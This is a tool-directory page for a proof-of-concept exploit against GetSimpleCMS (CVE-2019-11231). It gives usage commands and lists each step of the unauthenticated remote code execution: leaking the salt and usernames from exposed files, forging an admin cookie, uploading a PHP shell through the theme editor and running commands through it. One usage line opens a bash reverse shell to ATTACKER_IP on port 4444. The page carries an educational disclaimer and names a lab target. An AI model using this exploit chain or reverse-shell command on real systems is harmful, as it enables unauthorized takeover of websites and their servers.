Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
Tools/GitHubGitHub/akincibor/cve-2019-11231-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

View Repository
18 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

GetSimpleCMS CVE-2019-11231 RCE Exploit

Python CVE

Unauthenticated Remote Code Execution exploit for GetSimpleCMS ≤ 3.3.15

Vulnerability

GetSimpleCMS exposes sensitive files publicly (/data/other/authorization.xml, /data/users/) allowing attackers to:

  1. Leak API keys and usernames
  2. Forge authentication cookies
  3. Obtain CSRF tokens
  4. Upload and execute arbitrary PHP code

CVSS Score: 9.8 (Critical)

Usage

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

How It Works

  1. Enumerate version → GET /admin/
Download Tool
  • Leak salt → GET /data/other/authorization.xml
  • Get username → GET /data/users/
  • Forge cookie → SHA1(username + salt)
  • Get nonce → GET /admin/theme-edit.php
  • Upload shell → POST /admin/theme-edit.php
  • Execute commands → GET /theme/shell.php?cmd=...
  • Files

    • exploit.py - Main exploit script
    • requirements.txt - Dependencies (requests, beautifulsoup4)

    Disclaimer

    ⚠️ Educational purposes only. Only test on systems you own or have permission to test.

    References

    • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231